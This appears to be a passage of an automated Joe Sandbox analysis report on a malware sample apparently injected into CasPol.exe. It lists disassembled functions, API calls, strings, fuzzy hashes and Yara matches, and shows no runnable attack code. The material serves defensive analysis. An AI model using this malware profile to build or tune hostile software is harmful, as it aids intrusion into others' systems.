                                                                                                                                                                                                                                  • Opcode ID: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                  • Instruction ID: 2f3713a405c0175dfbb4312078a92c0e6100ffda4a0d56c92506938931a9961d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7931C835704B408FF724CE5CACA0A1BB3E7EB406D7B610A2DF592CB695D762ED4087A1
                                                                                                                                                                                                                                  Function 10003570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                  • Instruction ID: 15c224a21538f9790836f5c726a40e0df5128f8623dfe489635fbbf3d33d23f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31C6323047119BF726CE5CAC8096BF3EDEB956D1760CA2EE58187759CB32DC4087A1
                                                                                                                                                                                                                                  Function 10004330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                  • Instruction ID: 1ea6db056af32ae78525d840582dd1771f02cb9085f46fc2c6811f606c33abc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F31D5B27057108BA734DE5CE88085EF3E9FF81691322562EF186C7618DF31AA4487A5
                                                                                                                                                                                                                                  Function 10003EC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10003FDB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                  • Instruction ID: 67010eaabe5ec19f8eb2dbbdff826c503681b6fb1e0afb3ed4744b86d6ac49c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F631D2367043128BE721CE5CE840B67F7F9EB916A1F214A3FF5468B649D772A84087A1
                                                                                                                                                                                                                                  Function 1000AE1D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                  • String ID: $MZ@
                                                                                                                                                                                                                                  • API String ID: 2325560087-1719208621
                                                                                                                                                                                                                                  • Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                  • Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60
                                                                                                                                                                                                                                  Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $fD
                                                                                                                                                                                                                                  • API String ID: 1807457897-3092946448
                                                                                                                                                                                                                                  • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                  • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                                                                                                                  Function 10003A70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10003B85
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
                                                                                                                                                                                                                                  • Instruction ID: edc99c1af25dbac56c4533e702380cee898722e9e6e8df2b93293301c0b2d031
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F631CF32304710CB9721DF6CE88085BF3E9FF85695311862FE686C7219EB31A95487A2
                                                                                                                                                                                                                                  Function 100080A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000818D
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10008197
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: vector<T> too long
                                                                                                                                                                                                                                  • API String ID: 909987262-3788999226
                                                                                                                                                                                                                                  • Opcode ID: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
                                                                                                                                                                                                                                  • Instruction ID: 1ccc3903a69bb7a6bcf247a0b5372026bbc2c80ecff82e53e65115d2b39116d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231C2353006065FDB2CCE79DDD445AB7E6FF842A03288A3DE587C7688D671F9418740
                                                                                                                                                                                                                                  Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                                                                                                                                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                                                                                                                                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                                                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                                                                                                                                  • Opcode ID: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
                                                                                                                                                                                                                                  • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                                                                                                                  Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                  • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                                                                                                                  Function 1000A270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                  • Instruction ID: b01bb7ab5e5c576250ddf7c738205e91cfded369ea80ce7225221d4f8e50cbfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6321BF34608781DFE721CF1CC880B4ABBF4FB46690F604B5EF49687645C772AA8487A2
                                                                                                                                                                                                                                  Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                                                                                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                                                                                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                                                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                                                  • String ID: image/png
                                                                                                                                                                                                                                  • API String ID: 1291196975-2966254431
                                                                                                                                                                                                                                  • Opcode ID: 76aa1df589c2512b038350c5e7dabeb64ab6e15cdba6467d299120167fee7ed3
                                                                                                                                                                                                                                  • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76aa1df589c2512b038350c5e7dabeb64ab6e15cdba6467d299120167fee7ed3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                                                                                                                  Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                  • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                  • Opcode ID: 2e0395223b26fae5f5e4daeef32f79f02daf745ae108a6d5104973bb0c079dd3
                                                                                                                                                                                                                                  • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e0395223b26fae5f5e4daeef32f79f02daf745ae108a6d5104973bb0c079dd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                                                                                                                  Function 045716AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                  • String ID: : $Se.
                                                                                                                                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                  • Instruction ID: 5cf38cf1194b227287976830ba168793e4b53b6e674098ba629a1c2f6869c204
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9110A71900289AEDB10DFA8E840BEDFBFDFF49208F104066E545E7251E6706B02D765
                                                                                                                                                                                                                                  Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                  • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                  • Opcode ID: 9fcb0be92f2f44c60cf8e727d64076d3f2da1c1356029e534b2b78fe2b7d5568
                                                                                                                                                                                                                                  • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fcb0be92f2f44c60cf8e727d64076d3f2da1c1356029e534b2b78fe2b7d5568
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                                                                  Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
